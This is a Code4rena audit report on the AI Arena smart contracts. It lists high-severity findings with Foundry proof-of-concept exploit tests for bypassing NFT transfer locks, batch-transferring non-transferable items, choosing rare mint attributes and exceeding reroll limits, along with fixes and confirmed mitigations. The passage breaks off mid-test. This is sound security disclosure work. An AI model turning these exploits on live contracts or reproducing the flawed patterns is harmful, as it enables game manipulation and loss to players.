AI Arena
Findings & Analysis Report


Table of contents


About C4

Code4rena (C4) is an open organization consisting of security researchers, auditors, developers, and individuals with domain expertise in smart contracts.

A C4 audit is an event in which community participants, referred to as Wardens, review, audit, or analyze smart contract logic in exchange for a bounty provided by sponsoring projects.

During the audit outlined in this document, C4 conducted an analysis of the AI Arena smart contract system written in Solidity. The audit took place between February 9—February 21 2024.

Following the C4 audit, 3 wardens (d3e4, fnanni, and niser93) reviewed the mitigations for all identified issues; the mitigation review report is appended below the audit report.


299 Wardens contributed reports to AI Arena:

  1. fnanni
  2. d3e4
  3. niser93
  4. haxatron
  5. BARW (BenRai and albertwh1te)
  6. juancito
  7. DanielArmstrong
  8. 0xDetermination
  9. merlinboii
  10. 0x11singh99
  11. MrPotatoMagic
  12. klau5
  13. MidgarAudits (vangrim and EVDoc)
  14. Timenov
  15. lil_eth
  16. btk
  17. givn
  18. rspadi
  19. josephdara
  20. SovaSlava
  21. Rolezn
  22. K42
  23. Sabit
  24. vnavascues
  25. 0xblackskull
  26. CodeWasp (slylandro_star, kuprum, audithare, and spaghetticode_sentinel)
  27. sobieski
  28. andywer
  29. ZanyBonzy
  30. 0xSmartContract
  31. immeas
  32. 14si2o_Flint
  33. Draiakoo
  34. hunter_w3b
  35. Greed
  36. sashik_eth
  37. yongskiws
  38. 0xepley
  39. aariiif
  40. popeye
  41. 0xweb3boy
  42. abhishek_thaku_r
  43. dimulski
  44. 0xCiphky
  45. offside0011
  46. PoeAudits
  47. ahmedaghadi
  48. yotov721
  49. kiqo
  50. djxploit
  51. PedroZurdo (CaeraDenoir and shui)
  52. alexzoid
  53. peter
  54. cats
  55. Tychai0s
  56. lsaudit
  57. kartik_giri_47538
  58. ktg
  59. DarkTower (0xrex and haxatron)
  60. 0xAlix2 (a_kalout and ali_shehab)
  61. stakog
  62. korok
  63. Aamir
  64. pontifex
  65. Fulum
  66. iamandreiski
  67. maxim371
  68. 0xShitgem
  69. radev_sw
  70. alexxander
  71. zaevlad
  72. t0x1c
  73. McToady
  74. Krace
  75. evmboi32
  76. 0xBinChook
  77. MatricksDeCoder
  78. ke1caM
  79. ubl4nk
  80. forkforkdog
  81. sl1
  82. swizz
  83. solmaxis69 (seeques and melihdhs)
  84. Aymen0909
  85. grearlake
  86. VAD37
  87. bhilare_
  88. Kow
  89. Zac
  90. 0xLogos
  91. web3pwn
  92. jnforja
  93. rouhsamad
  94. BoRonGod
  95. Tricko
  96. 0brxce
  97. zxriptor
  98. Kalogerone
  99. visualbits
  100. Velislav4o
  101. lanrebayode77
  102. shaflow2
  103. SpicyMeatball
  104. ladboy233
  105. Shubham
  106. nuthan2x
  107. jesjupyter
  108. favelanky
  109. 0xvj
  110. SAQ
  111. JcFichtner
  112. _eperezok
  113. PetarTolev
  114. sandy
  115. 0xStriker
  116. kutugu
  117. Bauchibred
  118. peanuts
  119. pynschon
  120. 0xAsen
  121. yovchev_yoan
  122. oualidpro
  123. rekxor
  124. pipidu83
  125. kaveyjoe
  126. hassanshakeel13
  127. ansa-zanjbeel
  128. cheatc0d3
  129. tala7985
  130. 0xbrett8571
  131. wahedtalash77
  132. fouzantanveer
  133. foxb868
  134. Myd
  135. 0xblack_bird
  136. cudo
  137. clara
  138. scokaf (Scoon and jauvany)
  139. albahaca
  140. JayShreeRAM
  141. 0xRiO
  142. shaka
  143. 0xE1
  144. AlexCzm
  145. emrekocak
  146. al88nsk
  147. mikesans
  148. SY_S
  149. SM3_SS
  150. shamsulhaq123
  151. donkicha
  152. dharma09
  153. unique
  154. Raihan
  155. yashgoel72
  156. lrivo
  157. 0xAnah
  158. ziyou-
  159. judeabara
  160. Blank_Space (bLnk and 10ambear)
  161. 0xmystery
  162. agadzhalov
  163. KmanOfficial
  164. cartlex_
  165. EagleSecurity (mitev and alexander_orjustalex)
  166. 0xMosh
  167. DeFiHackLabs (IceBear, SunSec, and ret2basic)
  168. BigVeezus
  169. Tekken
  170. 0xAkira
  171. 7ashraf
  172. Bube
  173. SHA_256
  174. BenasVol
  175. boredpukar
  176. c0pp3rscr3w3r
  177. 0xgrbr
  178. Giorgio
  179. aslanbek
  180. petro_1912
  181. n0kto
  182. VrONTg
  183. handsomegiraffe
  184. denzi_
  185. csanuragjain
  186. ubermensch
  187. erosjohn
  188. Silvermist
  189. pkqs90
  190. 0xlemon
  191. WoolCentaur
  192. FloatingPragma (Stoicov and nmirchev8)
  193. soliditywala
  194. Ryonen
  195. Abdessamed
  196. radin100
  197. blutorque
  198. 0rpse
  199. Tendency
  200. krikolkk
  201. Topmark
  202. zhaojohnson
  203. matejdb
  204. Honour
  205. israeladelaja
  206. ni8mare
  207. YouCrossTheLineAlfie
  208. neocrao
  209. 0xAadi
  210. forgebyola
  211. Merulez99
  212. Varun_05
  213. devblixt
  214. 0xWallSecurity
  215. dutra
  216. Matue
  217. Tumelo_Crypto
  218. KupiaSec
  219. JCN
  220. AC000123
  221. ADM
  222. stackachu
  223. 0xKowalski
  224. 0xAleko
  225. OMEN
  226. adamn000
  227. Archime
  228. 0xaghas
  229. novamanbg
  230. xchen1130
  231. 0xbranded
  232. linmiaomiao
  233. AgileJune
  234. Davide
  235. Jorgect
  236. okolicodes
  237. 0xabhay
  238. 0xG0P1
  239. merlin
  240. almurhasan
  241. tallo
  242. 0xlamide
  243. dipp
  244. ReadyPlayer2
  245. 0x13
  246. deadrxsezzz
  247. Nyxaris
  248. inzinko
  249. cu5t0mpeo
  250. Avci (0xdanial and 0xArshia)
  251. 0xPluto
  252. jesusrod15
  253. taner2344
  254. y4y
  255. Fitro
  256. GoSlang
  257. Cryptor
  258. pa6kuda
  259. thank_you
  260. dvrkzy
  261. Pelz
  262. GhK3Ndf
  263. Limbooo
  264. hulkvision
  265. jaydhales
  266. Josh4324
  267. DMoore
  268. adam-idarrha
  269. 0xlyov
  270. 0xGreyWolf
  271. tpiliposian
  272. 0xkaju
  273. honey-k12
  274. bgsmallerbear
  275. PUSH0 (jojo and thekmj)
  276. gesha17
  277. desaperh
  278. Daniel526
  279. m4ttm
  280. 0xprinc
  281. Breeje
  282. 0xpoor4ever

The original audit was judged by hickuphh3.

The mitigation review was judged by ronnyx2017.

Final report assembled by PaperParachute and liveactionllama.


The C4 analysis yielded an aggregated total of 17 unique vulnerabilities. Of these vulnerabilities, 8 received a risk rating in the category of HIGH severity and 9 received a risk rating in the category of MEDIUM severity.

Additionally, C4 analysis included 60 reports detailing issues with a risk rating of LOW severity or non-critical. There were also 36 reports recommending gas optimizations.

All of the issues presented here are linked back to their original finding.


The code under review can be found within the C4 AI Arena repository, and is composed of 9 smart contracts written in the Solidity programming language and includes 1271 lines of Solidity code.

In addition to the known issues identified by the project team, a Code4rena bot race was conducted at the start of the audit. The winning bot, TragedyOTCommons from warden IllIllI, generated the Automated Findings report and all findings therein were classified as out of scope.

Severity Criteria

C4 assesses the severity of disclosed vulnerabilities based on three primary risk categories: high, medium, and low/non-critical.

High-level considerations for vulnerabilities span the following key areas when conducting assessments:

  • Malicious Input Handling
  • Escalation of privileges
  • Arithmetic
  • Gas use

For more information regarding the severity criteria referenced throughout the submission review process, please refer to the documentation provided on the C4 website, specifically our section on Severity Categorization.

High Risk Findings (8)

[H-01] A locked fighter can be transferred; leads to game server unable to commit transactions, and unstoppable fighters

Submitted by CodeWasp, also found by adam-idarrha, d3e4, vnavascues, c0pp3rscr3w3r, shaka, GhK3Ndf, alexxander, Fulum, thank_you, denzi_, Limbooo, korok, evmboi32, juancito, grearlake, ktg, radev_sw, rouhsamad, KmanOfficial, MidgarAudits, KupiaSec, 0xaghas, Bauchibred, jaydhales, immeas, MrPotatoMagic, soliditywala, sashik_eth, 0xLogos, Tendency, 0x13, PedroZurdo, al88nsk, ladboy233 (1, 2), merlinboii, DanielArmstrong, hulkvision, israeladelaja, Draiakoo, ADM, petro_1912, nuthan2x, 0xCiphky, peanuts, cats, 0xAsen, stackachu, deadrxsezzz, Krace, jnforja, 0xvj, _eperezok, pkqs90, Josh4324, web3pwn, Aamir, btk, pynschon (1, 2), 0xE1, ubl4nk, fnanni, devblixt, cartlex_, erosjohn, BARW, dimulski, zhaojohnson, blutorque, Kalogerone, DMoore, jesjupyter, 0xlemon, klau5, 0xAlix2, alexzoid, novamanbg, sobieski, xchen1130, matejdb, tallo, Pelz, oualidpro, aslanbek, and 0xlyov

FighterFarm contract implements restrictions on the transferability of fighters in functions transferFrom() and safeTransferFrom(), via the call to function _ableToTransfer(). Unfortunately this approach doesn’t cover all possible ways to transfer a fighter: The FighterFarm contract inherits from OpenZeppelin’s ERC721 contract, which includes the public function safeTransferFrom(…, data), i.e. the same as safeTransferFrom() but with the additional data parameter. This inherited function becomes available in the GameItems contract, and calling it allows us to circumvent the transferability restriction. As a result, a player will be able to transfer any of their fighters, irrespective of whether they are locked or not. Violation of such a basic system invariant leads to various kinds of impacts, including:

  • The game server won’t be able to commit some transactions;
  • The transferred fighter becomes unstoppable (a transaction in which it loses can’t be committed);
  • The transferred fighter may be used as a “poison pill” to spoil another player, and prevent it from leaving the losing zone (a transaction in which it wins can’t be committed).

Both of the last two impacts include the inability of the game server to commit certain transactions, so we illustrate both of the last two with PoCs, thus illustrating the first one as well.

Impact 1: A fighter becomes unstoppable, game server unable to commit

If a fighter wins a battle, points are added to accumulatedPointsPerAddress mapping. When a fighter loses a battle, the reverse happens: points are subtracted. If a fighter is transferred after it wins the battle to another address, accumulatedPointsPerAddress for the new address is empty, and thus the points can’t be subtracted: the game server transaction will be reverted. By transferring the fighter to a new address after each battle, the fighter becomes unstoppable, as its accumulated points will only grow, and will never decrease.

Impact 2: Another fighter can’t win, game server unable to commit

If a fighter loses a battle, funds are transferred from the amount at stake, to the stake-at risk, which is reflected in the amountLost mapping of StakeAtRisk contract. If the fighter with stake-at-risk is transferred to another player, the invariant that amountLost reflects the lost amount per address is violated: after the transfer the second player has more stake-at-risk than before. A particular way to exploit this violation is demonstrated below: the transferred fighter may win a battle, which leads to reducing amountLost by the corresponding amount. Upon subsequent wins of the second player own fighters, this operation will underflow, leading to the game server unable to commit transactions, and the player unable to exit the losing zone. This effectively makes a fighter with the stake-at-risk a “poison pill”.

Proof of Concept

Impact 1: A fighter becomes unstoppable, game server unable to commit

diff --git a/test/RankedBattle.t.sol b/test/RankedBattle.t.sol
index 6c5a1d7..dfaaad4 100644
--- a/test/RankedBattle.t.sol
+++ b/test/RankedBattle.t.sol
@@ -465,6 +465,31 @@ contract RankedBattleTest is Test {
         assertEq(unclaimedNRN, 5000 * 10 ** 18);
+   /// @notice An exploit demonstrating that it's possible to transfer a staked fighter, and make it immortal!
+    function testExploitTransferStakedFighterAndPlay() public {
+        address player = vm.addr(3);
+        address otherPlayer = vm.addr(4);
+        _mintFromMergingPool(player);
+        uint8 tokenId = 0;
+        _fundUserWith4kNeuronByTreasury(player);
+        vm.prank(player);
+        _rankedBattleContract.stakeNRN(1 * 10 ** 18, tokenId);
+        // The fighter wins one battle
+        vm.prank(address(_GAME_SERVER_ADDRESS));
+        _rankedBattleContract.updateBattleRecord(tokenId, 0, 0, 1500, true);
+        // The player transfers the fighter to other player
+        vm.prank(address(player));
+        _fighterFarmContract.safeTransferFrom(player, otherPlayer, tokenId, "");
+        assertEq(_fighterFarmContract.ownerOf(tokenId), otherPlayer);
+        // The fighter can't lose
+        vm.prank(address(_GAME_SERVER_ADDRESS));
+        vm.expectRevert();
+        _rankedBattleContract.updateBattleRecord(tokenId, 0, 2, 1500, true);
+        // The fighter can only win: it's unstoppable!
+        vm.prank(address(_GAME_SERVER_ADDRESS));
+        _rankedBattleContract.updateBattleRecord(tokenId, 0, 0, 1500, true);
+    }

Place the PoC into test/RankedBattle.t.sol, and execute with

forge test --match-test testExploitTransferStakedFighterAndPlay

Impact 2: Another fighter can’t win, game server unable to commit

diff --git a/test/RankedBattle.t.sol b/test/RankedBattle.t.sol
index 6c5a1d7..196e3a0 100644
--- a/test/RankedBattle.t.sol
+++ b/test/RankedBattle.t.sol
@@ -465,6 +465,62 @@ contract RankedBattleTest is Test {
         assertEq(unclaimedNRN, 5000 * 10 ** 18);
+/// @notice Prepare two players and two fighters
+function preparePlayersAndFighters() public returns (address, address, uint8, uint8) {
+    address player1 = vm.addr(3);
+    _mintFromMergingPool(player1);
+    uint8 fighter1 = 0;
+    _fundUserWith4kNeuronByTreasury(player1);
+    address player2 = vm.addr(4);
+    _mintFromMergingPool(player2);
+    uint8 fighter2 = 1;
+    _fundUserWith4kNeuronByTreasury(player2);
+    return (player1, player2, fighter1, fighter2);
+/// @notice An exploit demonstrating that it's possible to transfer a fighter with funds at stake
+/// @notice After transferring the fighter, it wins the battle, 
+/// @notice and the second player can't exit from the stake-at-risk zone anymore.
+function testExploitTransferStakeAtRiskFighterAndSpoilOtherPlayer() public {
+    (address player1, address player2, uint8 fighter1, uint8 fighter2) = 
+        preparePlayersAndFighters();
+    vm.prank(player1);
+    _rankedBattleContract.stakeNRN(1_000 * 10 **18, fighter1);        
+    vm.prank(player2);
+    _rankedBattleContract.stakeNRN(1_000 * 10 **18, fighter2);        
+    // Fighter1 loses a battle
+    vm.prank(address(_GAME_SERVER_ADDRESS));
+    _rankedBattleContract.updateBattleRecord(fighter1, 0, 2, 1500, true);
+    assertEq(_rankedBattleContract.amountStaked(fighter1), 999 * 10 ** 18);
+    // Fighter2 loses a battle
+    vm.prank(address(_GAME_SERVER_ADDRESS));
+    _rankedBattleContract.updateBattleRecord(fighter2, 0, 2, 1500, true);
+    assertEq(_rankedBattleContract.amountStaked(fighter2), 999 * 10 ** 18);
+    // On the game server, player1 initiates a battle with fighter1,
+    // then unstakes all remaining stake from fighter1, and transfers it
+    vm.prank(address(player1));
+    _rankedBattleContract.unstakeNRN(999 * 10 ** 18, fighter1);
+    vm.prank(address(player1));
+    _fighterFarmContract.safeTransferFrom(player1, player2, fighter1, "");
+    assertEq(_fighterFarmContract.ownerOf(fighter1), player2);
+    // Fighter1 wins a battle, and part of its stake-at-risk is derisked.
+    vm.prank(address(_GAME_SERVER_ADDRESS));
+    _rankedBattleContract.updateBattleRecord(fighter1, 0, 0, 1500, true);
+    assertEq(_rankedBattleContract.amountStaked(fighter1), 1 * 10 ** 15);
+    // Fighter2 wins a battle, but the records can't be updated, due to underflow!
+    vm.expectRevert();
+    vm.prank(address(_GAME_SERVER_ADDRESS));
+    _rankedBattleContract.updateBattleRecord(fighter2, 0, 0, 1500, true);
+    // Fighter2 can't ever exit from the losing zone in this round, but can lose battles
+    vm.prank(address(_GAME_SERVER_ADDRESS));
+    _rankedBattleContract.updateBattleRecord(fighter2, 0, 2, 1500, true);
+    (uint32 wins, uint32 ties, uint32 losses) = _rankedBattleContract.getBattleRecord(fighter2);
+    assertEq(wins, 0);
+    assertEq(ties, 0);
+    assertEq(losses, 2);

Place the PoC into test/RankedBattle.t.sol, and execute with

forge test --match-test testExploitTransferStakeAtRiskFighterAndSpoilOtherPlayer

Remove the incomplete checks in the inherited functions transferFrom() and safeTransferFrom() of FighterFarm contract, and instead to enforce the transferability restriction via the _beforeTokenTransfer() hook, which applies equally to all token transfers, as illustrated below.

diff --git a/src/FighterFarm.sol b/src/FighterFarm.sol
index 06ee3e6..9f9ac54 100644
--- a/src/FighterFarm.sol
+++ b/src/FighterFarm.sol
@@ -330,40 +330,6 @@ contract FighterFarm is ERC721, ERC721Enumerable {
-    /// @notice Transfer NFT ownership from one address to another.
-    /// @dev Add a custom check for an ability to transfer the fighter.
-    /// @param from Address of the current owner.
-    /// @param to Address of the new owner.
-    /// @param tokenId ID of the fighter being transferred.
-    function transferFrom(
-        address from, 
-        address to, 
-        uint256 tokenId
-    ) 
-        public 
-        override(ERC721, IERC721)
-    {
-        require(_ableToTransfer(tokenId, to));
-        _transfer(from, to, tokenId);
-    }
-    /// @notice Safely transfers an NFT from one address to another.
-    /// @dev Add a custom check for an ability to transfer the fighter.
-    /// @param from Address of the current owner.
-    /// @param to Address of the new owner.
-    /// @param tokenId ID of the fighter being transferred.
-    function safeTransferFrom(
-        address from, 
-        address to, 
-        uint256 tokenId
-    ) 
-        public 
-        override(ERC721, IERC721)
-    {
-        require(_ableToTransfer(tokenId, to));
-        _safeTransfer(from, to, tokenId, "");
-    }
     /// @notice Rolls a new fighter with random traits.
     /// @param tokenId ID of the fighter being re-rolled.
     /// @param fighterType The fighter type.
@@ -448,7 +414,9 @@ contract FighterFarm is ERC721, ERC721Enumerable {
         override(ERC721, ERC721Enumerable)
-        super._beforeTokenTransfer(from, to, tokenId);
+        if(from != address(0) && to != address(0))
+            require(_ableToTransfer(tokenId, to));
+        super._beforeTokenTransfer(from, to , tokenId);

brandinho (AI Arena) confirmed

AI Arena mitigated:

Fixed safeTransferFrom override with data.

Status: Mitigation confirmed. Full details in reports from niser93, d3e4, and fnanni.

[H-02] Non-transferable GameItems can be transferred with GameItems::safeBatchTransferFrom(...)

Submitted by Aamir, also found by m4ttm, vnavascues, visualbits, Fulum, peter, GhK3Ndf, shaka, sandy, alexxander, thank_you, evmboi32, 0xprinc, Limbooo, denzi_, grearlake, Greed, korok, josephdara, juancito, ZanyBonzy, Breeje, hulkvision, KmanOfficial, CodeWasp, DeFiHackLabs, 0xaghas, MidgarAudits, Ryonen, alexzoid, n0kto, immeas, Aymen0909, jaydhales, sashik_eth, soliditywala, 0xLogos, 0x13, Tendency, 0xpoor4ever, PedroZurdo, merlinboii, ni8mare, BARW, israeladelaja, 0xlyov, Draiakoo, petro_1912, ADM, Krace, 0x11singh99, McToady, ktg, 0xCiphky, MrPotatoMagic, 0xWallSecurity, cats, nuthan2x, ladboy233, 0xAsen, stackachu, deadrxsezzz, 0xvj, _eperezok, pkqs90, Josh4324, web3pwn, jnforja, Jorgect, SovaSlava, btk, pynschon, blutorque, lil_eth, 0xE1, fnanni, Bauchibred, devblixt, tpiliposian, erosjohn, Pelz, ubl4nk, cartlex_, krikolkk, Kalogerone, kutugu, zhaojohnson, shaflow2, pa6kuda, djxploit, solmaxis69, 0rpse, 0xlemon, 0xKowalski, SpicyMeatball, novamanbg, DMoore, jesjupyter, csanuragjain, 0xBinChook, matejdb, tallo, aslanbek, 0xAlix2, sobieski, kiqo, dimulski, xchen1130, 0xbranded, oualidpro, Timenov, haxatron, klau5, and al88nsk

The GamesItems contract fails to appropriately override and include essential checks within the safeBatchTransferFrom function, enabling the transfer of non-transferrable Game Items.


While the GamesItems contract allows for the designation of Game Items as either transferrable or non-transferrable through different states and overrides the ERC1155::safeTransferFrom(...) function accordingly, it neglects to override the ERC1155::safeBatchTransferFrom(...) function. This oversight permits users to transfer Game Items that were intended to be non-transferrable.

Proof of Concept

Here is a test for PoC:

NOTE: Include the below given test in GameItems.t.sol.

    function testNonTransferableItemCanBeTransferredWithBatchTransfer() public {
        // funding owner address with 4k $NRN

        // owner minting itme, 1);

        // checking that the item is minted correctly
        assertEq(_gameItemsContract.balanceOf(_ownerAddress, 0), 1);

        // making the item non-transferable
        _gameItemsContract.adjustTransferability(0, false);

        // trying to transfer the non-transferable item. Should revert
        _gameItemsContract.safeTransferFrom(_ownerAddress, _DELEGATED_ADDRESS, 0, 1, "");

        // checking that the item is still in the owner's account
        assertEq(_gameItemsContract.balanceOf(_DELEGATED_ADDRESS, 0), 0);
        assertEq(_gameItemsContract.balanceOf(_ownerAddress, 0), 1);

        // transferring the item using safeBatchTransferFrom
        uint256[] memory ids = new uint256[](1);
        ids[0] = 0;
        uint256[] memory amounts = new uint256[](1);
        amounts[0] = 1;
        _gameItemsContract.safeBatchTransferFrom(_ownerAddress, _DELEGATED_ADDRESS, ids, amounts, "");

        // checking that the item is transferred to the delegated address
        assertEq(_gameItemsContract.balanceOf(_DELEGATED_ADDRESS, 0), 1);
        assertEq(_gameItemsContract.balanceOf(_ownerAddress, 0), 0);


└─$ forge test --mt testNonTransferableItemCanBeTransferredWithBatchTransfer
[⠒] Compiling...
[⠃] Compiling 1 files with 0.8.13
[⠒] Solc 0.8.13 finished in 1.77s
Compiler run successful!

Running 1 test for test/GameItems.t.sol:GameItemsTest
[PASS] testNonTransferableItemCanBeTransferredWithBatchTransfer() (gas: 190756)
Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.32ms
Ran 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)

Tools Used


It is recommended to override the safeBatchTransferFrom(...) function and include the necessary checks to prevent the transfer of non-transferrable Game Items.

+    function safeBatchTransferFrom(
+        address from,
+        address to,
+        uint256[] memory ids,
+        uint256[] memory amounts,
+        bytes memory data
+    ) public override(ERC1155) {
+        for(uint256 i; i < ids.length; i++{
+            require(allGameItemAttributes[ids[i]].transferable);
+        }
+        super.safeBatchTransferFrom(from, to, ids, amounts, data);
+    }

Or, consider overriding the _safeBatchTransferFrom(...) function as follows:

+    function _safeBatchTransferFrom(
+        address from,
+        address to,
+        uint256[] memory ids,
+        uint256[] memory amounts,
+        bytes memory data
+    ) internal override(1155) {
+        require(ids.length == amounts.length, "ERC1155: ids and amounts length mismatch");
+        require(to != address(0), "ERC1155: transfer to the zero address");
+        address operator = _msgSender();
+        _beforeTokenTransfer(operator, from, to, ids, amounts, data);
+        for (uint256 i = 0; i < ids.length; ++i) {
+            require(
+            uint256 id = ids[i];
+            uint256 amount = amounts[i];
+           require(allGameItemAttributes[id].transferable);
+            uint256 fromBalance = _balances[id][from];
+            require(fromBalance >= amount, "ERC1155: insufficient balance for transfer");
+            unchecked {
+                _balances[id][from] = fromBalance - amount;
+            }
+            _balances[id][to] += amount;
+        }
+        emit TransferBatch(operator, from, to, ids, amounts);
+        _afterTokenTransfer(operator, from, to, ids, amounts, data);
+        _doSafeBatchTransferAcceptanceCheck(operator, from, to, ids, amounts, data);
+    }

brandinho (AI Arena) confirmed

hickuphh3 (judge) increased severity to High

AI Arena mitigated:

Fixed Non-transferable GameItems being transferred with GameItems::safeBatchTransferFrom.

Status: Mitigation confirmed. Full details in reports from niser93, d3e4, and fnanni.

[H-03] Players have complete freedom to customize the fighter NFT when calling redeemMintPass and can redeem fighters of types Dendroid and with rare attributes

Submitted by Abdessamed, also found by juancito (1, 2), vnavascues, d3e4, DarkTower, shaka, alexxander, 0xmystery, evmboi32 (1, 2, 3), soliditywala, givn, korok, dimulski, denzi_, VAD37, sl1, OMEN, stakog, ahmedaghadi, Ryonen, FloatingPragma, n0kto (1, 2), adamn000, 0rpse, bhilare_, 0xAsen, Tendency, ke1caM, Draiakoo (1, 2), Archime, ADM, McToady, MrPotatoMagic, 0xCiphky (1, 2), VrONTg, Velislav4o, btk (1, 2), stackachu, zhaojohnson, 0xvj (1, 2), pkqs90, devblixt, niser93, cats, peter, BARW (1, 2, 3), Aamir, jesjupyter, fnanni, alexzoid, krikolkk, t0x1c, yotov721, klau5, 0xlemon, radin100, 0xAlix2, SpicyMeatball, matejdb, haxatron, JCN, immeas, PetarTolev, and Zac

The function redeemMintPass allows burning multiple mint passes in exchange for fighters’ NFTs. It is mentioned by the sponsor that the player should not have a choice of customizing the fighters’ properties and their type. However, nothing prevents a player from:

  1. Providing uint8[] fighterTypes of values 1 to mint fighters of types Dendroid.
  2. Checking previous transactions in which the dna provided led to minting fighters with rare physical attributes, copying those Dnas and passing them to the redeemMinPass to mint fighters with low rarity attributes. That is because creating physical attributes is deterministic, so providing the same inputs leads to generating a fighter with the same attributes.


This issue has two major impacts:

  • Players with valid mint passes can mint fighters of type Dendroid easily.
  • Players with valid mint passes can mint easily fighters with low rarity attributes which breaks the pseudo-randomness attributes generation aspect

Proof of Concept

For someone having valid mint passes, he calls the function redeemMintPass providing fighterTypes array of values 1. For each mint pass, the inner function _createNewFighter will be called passing the value 1 as fighterType argument which corresponds to Dendroid, a new fighter of type dendroid will be minted for the caller.

function test_redeeming_dendroid_fighters_easily() public {
    uint8[2] memory numToMint = [1, 0];
    bytes memory signature = abi.encodePacked(
    string[] memory _tokenURIs = new string[](1);
    _tokenURIs[0] = "ipfs://bafybeiaatcgqvzvz3wrjiqmz2ivcu2c5sqxgipv5w2hzy4pdlw7hfox42m";

    // first i have to mint an nft from the mintpass contract
    assertEq(_mintPassContract.mintingPaused(), false);
    _mintPassContract.claimMintPass(numToMint, signature, _tokenURIs);
    assertEq(_mintPassContract.balanceOf(_ownerAddress), 1);
    assertEq(_mintPassContract.ownerOf(1), _ownerAddress);

    // once owning one i can then redeem it for a fighter
    uint256[] memory _mintpassIdsToBurn = new uint256[](1);
    string[] memory _mintPassDNAs = new string[](1);
    uint8[] memory _fighterTypes = new uint8[](1);
    uint8[] memory _iconsTypes = new uint8[](1);
    string[] memory _neuralNetHashes = new string[](1);
    string[] memory _modelTypes = new string[](1);

    _mintpassIdsToBurn[0] = 1;
    _mintPassDNAs[0] = "dna";
    _fighterTypes[0] = 1; // @audit Notice that I can provide value 1 which corresponds to Dendroid type
    _neuralNetHashes[0] = "neuralnethash";
    _modelTypes[0] = "original";
    _iconsTypes[0] = 1;

    // approve the fighterfarm contract to burn the mintpass
    _mintPassContract.approve(address(_fighterFarmContract), 1);

    _mintpassIdsToBurn, _fighterTypes, _iconsTypes, _mintPassDNAs, _neuralNetHashes, _modelTypes

    // check balance to see if we successfully redeemed the mintpass for a fighter
    assertEq(_fighterFarmContract.balanceOf(_ownerAddress), 1);
Ran 1 test for test/FighterFarm.t.sol:FighterFarmTest
[PASS] test_redeeming_dendroid_fighters_easily() (gas: 578678)
Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 6.56ms

Ran 1 test suite: 1 tests passed, 0 failed, 0 skipped (1 total tests)

The player can also inspect previous transactions that minted a fighter with rare attributes, copy the provided mintPassDnas and provide them as argument in the redeemMintPass. The _createNewFighter function calls AiArenaHelper to create the physical attributes for the fighter. The probability of attributes is deterministic and since the player provided dna that already led to a fighter with rare attributes, his fighter will also have rare attributes.

The main issue is that the mint pass token is not tied to the fighter properties that the player should claim and the player has complete freedom of the inputs. Consider implementing a signature mechanism that prevents the player from changing the fighter’s properties like implemented in claimFighters

brandinho (AI Arena) confirmed

AI Arena mitigated:

Status: Mitigation confirmed. Full details in reports from niser93 and fnanni.

[H-04] Since you can reroll with a different fighterType than the NFT you own, you can reroll bypassing maxRerollsAllowed and reroll attributes based on a different fighterType

Submitted by klau5, also found by McToady, Tychai0s (1, 2), vnavascues, d3e4, shaka, alexxander, grearlake, AlexCzm, lanrebayode77, evmboi32, givn, juancito, VAD37, Varun_05, DanielArmstrong, linmiaomiao, 14si2o_Flint, Ryonen, n0kto, alexzoid, ktg, denzi_, Aymen0909, Davide, soliditywala, Aamir, sashik_eth, sl1, nuthan2x, 0xAsen, merlinboii, ke1caM, Draiakoo, petro_1912, MrPotatoMagic, PoeAudits, 0xCiphky, aslanbek, 0xvj, cats (1, 2), yotov721, btk, pynschon, solmaxis69, fnanni, 0xAlix2, 0xKowalski, blutorque, t0x1c, ubl4nk, BARW, radin100, Giorgio, zhaojohnson, 0xlemon, jesjupyter, SpicyMeatball, novamanbg, xchen1130, matejdb, haxatron, 0xAleko, Blank_Space, and Silvermist

Can reroll attributes based on a different fighterType, and can bypass maxRerollsAllowed.

Proof of Concept

maxRerollsAllowed can be set differently depending on the fighterType. Precisely, it increases as the generation of fighterType increases.

function incrementGeneration(uint8 fighterType) external returns (uint8) {
    require(msg.sender == _ownerAddress);
@>  generation[fighterType] += 1;
@>  maxRerollsAllowed[fighterType] += 1;
    return generation[fighterType];

The reRoll function does not verify if the fighterType given as a parameter is actually the fighterType of the given tokenId. Therefore, it can use either 0 or 1 regardless of the actual type of the NFT.

This allows bypassing maxRerollsAllowed for additional reRoll, and to call _createFighterBase and createPhysicalAttributes based on a different fighterType than the actual NFT’s fighterType, resulting in attributes calculated based on different criteria.

function reRoll(uint8 tokenId, uint8 fighterType) public {
    require(msg.sender == ownerOf(tokenId));
@>  require(numRerolls[tokenId] < maxRerollsAllowed[fighterType]);
    require(_neuronInstance.balanceOf(msg.sender) >= rerollCost, "Not enough NRN for reroll");

    _neuronInstance.approveSpender(msg.sender, rerollCost);
    bool success = _neuronInstance.transferFrom(msg.sender, treasuryAddress, rerollCost);
    if (success) {
        numRerolls[tokenId] += 1;
        uint256 dna = uint256(keccak256(abi.encode(msg.sender, tokenId, numRerolls[tokenId])));
@>      (uint256 element, uint256 weight, uint256 newDna) = _createFighterBase(dna, fighterType);
        fighters[tokenId].element = element;
        fighters[tokenId].weight = weight;
        fighters[tokenId].physicalAttributes = _aiArenaHelperInstance.createPhysicalAttributes(
@>          generation[fighterType],
        _tokenURIs[tokenId] = "";


  1. First, there is a bug that there is no way to set numElements, so add a numElements setter to FighterFarm. This bug has been submitted as a separate report.

    function numElementsSetterForPoC(uint8 _generation, uint8 _newElementNum) public {
        require(msg.sender == _ownerAddress);
        require(_newElementNum > 0);
        numElements[_generation] = _newElementNum;
  2. Add a test to the FighterFarm.t.sol file and run it. The generation of Dendroid has increased, and maxRerollsAllowed has increased. The user who owns the Champion NFT bypassed maxRerollsAllowed by putting the fighterType of Dendroid as a parameter in the reRoll function.

    function testPoCRerollBypassMaxRerollsAllowed() public {
        // get 4k neuron from treasury
        // after successfully minting a fighter, update the model
        if (_fighterFarmContract.ownerOf(0) == _ownerAddress) {
            uint8 maxRerolls = _fighterFarmContract.maxRerollsAllowed(0);
            uint8 exceededLimit = maxRerolls + 1;
            uint8 tokenId = 0;
            uint8 fighterType = 0;
            // The Dendroid's generation changed, and maxRerollsAllowed for Dendroid is increased
            uint8 fighterType_Dendroid = 1;
            assertEq(_fighterFarmContract.maxRerollsAllowed(fighterType_Dendroid), maxRerolls + 1);
            assertEq(_fighterFarmContract.maxRerollsAllowed(fighterType), maxRerolls); // Champions maxRerollsAllowed is not changed
            _fighterFarmContract.numElementsSetterForPoC(1, 3); // this is added function for poc
